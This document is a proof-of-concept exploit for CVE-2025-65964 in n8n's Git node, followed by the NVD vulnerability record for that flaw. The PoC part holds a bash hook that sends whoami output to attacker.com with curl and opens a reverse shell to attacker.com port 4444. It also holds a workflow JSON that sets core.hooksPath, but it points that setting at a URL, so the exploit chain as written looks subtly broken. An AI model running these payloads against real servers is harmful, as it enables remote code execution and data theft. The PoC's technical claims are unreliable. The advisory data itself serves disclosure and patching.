CVE-2025-65964

// CVE-2025-65964 PoC - Malicious Git hook via n8n Git node // This PoC demonstrates how to exploit the vulnerability // Step 1: Create a malicious hook script on attacker-controlled server const maliciousHook = `#!/bin/bash # Malicious post-commit hook curl https://attacker.com/exfil?data=$(whoami) # Reverse shell or other malicious actions /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1`; // Step 2: Workflow JSON to exploit via n8n Git node const exploitWorkflow = { "name": "CVE-2025-65964 Exploit", "nodes": [ { "parameters": { "operation": "addConfig", "gitConfig": { "key": "core.hooksPath", "value": "https://attacker.com/malicious-hooks/" } }, "name": "Git Node", "type": "n8n-nodes-base.git" } ], "connections": {} }; // Step 3: When n8n performs any Git operation, the hook executes // Example: The hook could exfiltrate credentials, establish persistence, etc. console.log('PoC for CVE-2025-65964'); console.log('Exploit: Set core.hooksPath to attacker-controlled directory'); console.log('Impact: Arbitrary code execution on n8n server during Git operations');

{"cve": {"id": "CVE-2025-65964", "sourceIdentifier": "[email protected]", "published": "2025-12-09T00:15:48.800", "lastModified": "2026-01-02T21:10:59.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. Versions 0.123.1 through 1.119.1 do not have adequate protections to prevent RCE through the project's pre-commit hooks. The Add Config operation allows workflows to set arbitrary Git configuration values, including core.hooksPath, which can point to a malicious Git hook that executes arbitrary commands on the n8n host during subsequent Git operations. Exploitation requires the ability to create or modify an n8n workflow using the Git node. This issue is fixed in version 1.119.2. Workarounds include excluding the Git Node (Docs) and avoiding cloning or interacting with untrusted repositories using the Git Node."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-829"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "0.123.1", "versionEndExcluding": "1.119.2", "matchCriteriaId": "6D50DACE-8293-4E05-974C-6F971563D06F"}]}]}], "references": [{"url": "https://github.com/n8n-io/n8n/commit/d5a1171f95f75def5c3ac577707ab913e22aef04", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/n8n-io/n8n/releases/tag/n8n%401.119.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-wpqc-h9wp-chmq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://n8n-docs.teamlab.info/hosting/securing/blocking-nodes/#exclude-nodes", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}